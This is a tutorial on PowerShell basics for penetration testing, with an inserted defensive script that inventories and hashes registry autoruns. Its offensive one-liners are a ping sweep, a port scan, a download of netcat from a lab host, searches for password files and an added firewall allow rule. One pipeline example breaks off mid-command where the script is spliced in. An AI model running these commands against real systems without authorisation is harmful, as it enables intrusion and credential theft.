A look at PowerShell for penetration testing

PowerShell is a very useful and powerful tool available in Windows 10; it is the successor to the old command prompt (cmd.exe).

In this article we look at some basic but useful examples to get you started.

Starting PowerShell

PowerShell is accessed by pressing Start, typing powershell and pressing Enter. Some operations require administrative privileges, so for those you need to launch PowerShell as an elevated session.

You can launch an elevated PowerShell by pressing Start, typing powershell and pressing Ctrl+Shift+Enter.


Useful Cmdlets (and aliases)

Get a directory listing (ls, dir, gci): PS C:\> Get-ChildItem

Copy a file (cp, copy, cpi): PS C:\> Copy-Item src.txt dst.txt

Move a file (mv, move, mi): PS C:\> Move-Item src.txt dst.txt

Find text within a file:
PS C:\> Select-String -Path c:\users\*.txt -Pattern password
PS C:\> ls -r c:\users -file | % {Select-String -Path $_ -Pattern password}

Display file contents (cat, type, gc): PS C:\> Get-Content file.txt

Get present directory (pwd, gl): PS C:\> Get-Location

Get a process listing (ps, gps): PS C:\> Get-Process

Get a service listing: PS C:\> Get-Service

Formatting output of a command (Format-List): PS C:\> ls | Format-List -Property name

Paginating output: PS C:\> ls -r | Out-Host -Paging

Get the SHA1 hash of a file: PS C:\> Get-FileHash -Algorithm SHA1 file.txt

Exporting output to CSV: PS C:\> Get-Process | Export-Csv procs.csv

Basic PowerShell for Pen testers

Conduct a ping sweep: PS C:\> 1..255 | % {echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | Select-String ttl}

Conduct a port scan: PS C:\> 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null

Fetch a file via HTTP (wget in PowerShell): PS C:\> (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","nc.exe")

Find all files with a particular name: PS C:\> Get-ChildItem "C:\Users\" -Recurse -Include *passwords*.txt

Get a listing of all installed Microsoft Hotfixes: PS C:\> Get-HotFix

Navigate the Windows registry:
PS C:\> cd HKLM:\
PS HKLM:\> ls

List programs set to start automatically in the registry: PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Convert a string from ASCII to Base64: PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("PS FTW!"))

List and modify the Windows firewall rules:
PS C:\> Get-NetFirewallRule -All
PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn -RemoteAddress 10.10.10.25

Finding Cmdlets

To get a list of all available cmdlets:
PS C:\> Get-Command

Get-Command supports filtering.

To filter cmdlets on the verb set:

PS C:\> Get-Command Set*
PS C:\> Get-Command -Verb Set

Or on the noun process:

PS C:\> Get-Command *Process
PS C:\> Get-Command -Noun Process

Pipelining, Loops, and Variables

Piping cmdlet output to another cmdlet: PS C:\> Get-Process | Format-List -Property name

ForEach-Object in the pipeline (alias %): PS C:\> ls *.txt | ForEach-Object {cat $_}

Where-Object condition (alias where or ?): PS C:\> Get-Process | Where-Object {$_.name -eq "notepad"}

Generating ranges of numbers and looping:
PS C:\> 1..10
PS C:\> 1..10 | % {echo "Hello!"}

Creating and listing variables:
PS C:\> $tmol = 42
PS C:\> ls variable:

Examples of passing cmdlet output down the pipeline:
PS C:\> dir | group extension | sort
PS C:\> Get-Service dhcp | Stop-Service -PassThru | Set
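Pulling several of the cmdlets above into one pipeline, here is an added example (not from the original article) that takes the autorun listing from the Run key shown earlier, hashes each referenced executable with Get-FileHash and exports the result with Export-Csv. It gives a defender a quick baseline of a common persistence location; it assumes Windows PowerShell 5.1 or later, and the HKCU and WOW6432Node Run keys are added on the assumption that you want the per-user and 32-bit locations as well.

```powershell
# Added example: inventory Run-key autoruns, hash the executables, export to CSV.
# Assumes Windows PowerShell 5.1+ (Get-FileHash needs 4.0 or later).
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',   # assumed: 32-bit apps on 64-bit Windows
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'                # assumed: current user's autoruns
)

# Get-ItemProperty adds these provider properties to the object; they are not registry values.
$metaProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

$entries = foreach ($key in $runKeys) {
    if (-not (Test-Path -Path $key)) { continue }

    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notin $metaProps } |
        ForEach-Object {
            $cmd = [string]$_.Value

            # The value is a command line; take the quoted token at the start if there
            # is one, otherwise everything up to the first space, then expand %VARS%.
            $exe = if ($cmd -match '^"([^"]+)"') { $Matches[1] } else { ($cmd -split ' ')[0] }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)

            # A Run entry that points at a missing file is itself worth a second look.
            $hash = 'FILE NOT FOUND'
            if (Test-Path -LiteralPath $exe -PathType Leaf) {
                $hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $exe).Hash
            }

            [pscustomobject]@{
                Key     = $key
                Name    = $_.Name
                Command = $cmd
                Path    = $exe
                SHA256  = $hash
            }
        }
}

$entries | Format-Table -AutoSize
$entries | Export-Csv -Path .\autoruns.csv -NoTypeInformation
```

Running the same script on a known-good build and diffing the two CSV files (compare the SHA256 column) is a simple way to spot an added or replaced autorun.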

Getting Help

To get help with help: PS C:\> Get-Help

To read cmdlet self documentation: PS C:\> Get-Help <cmdlet>

Detailed help: PS C:\> Get-Help <cmdlet> -detailed

Usage examples: PS C:\> Get-Help <cmdlet> -examples

Full (everything) help: PS C:\> Get-Help <cmdlet> -full

Online help (if available): PS C:\> Get-Help <cmdlet> -online


More

If you want to learn more about PowerShell there are a myriad of online resources. If you want to see how powerful it can be, I recommend looking at https://github.com/samratashok/nishang; the summary on GitHub sums it up for me:

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

The PowerShell scripts are well worth looking at.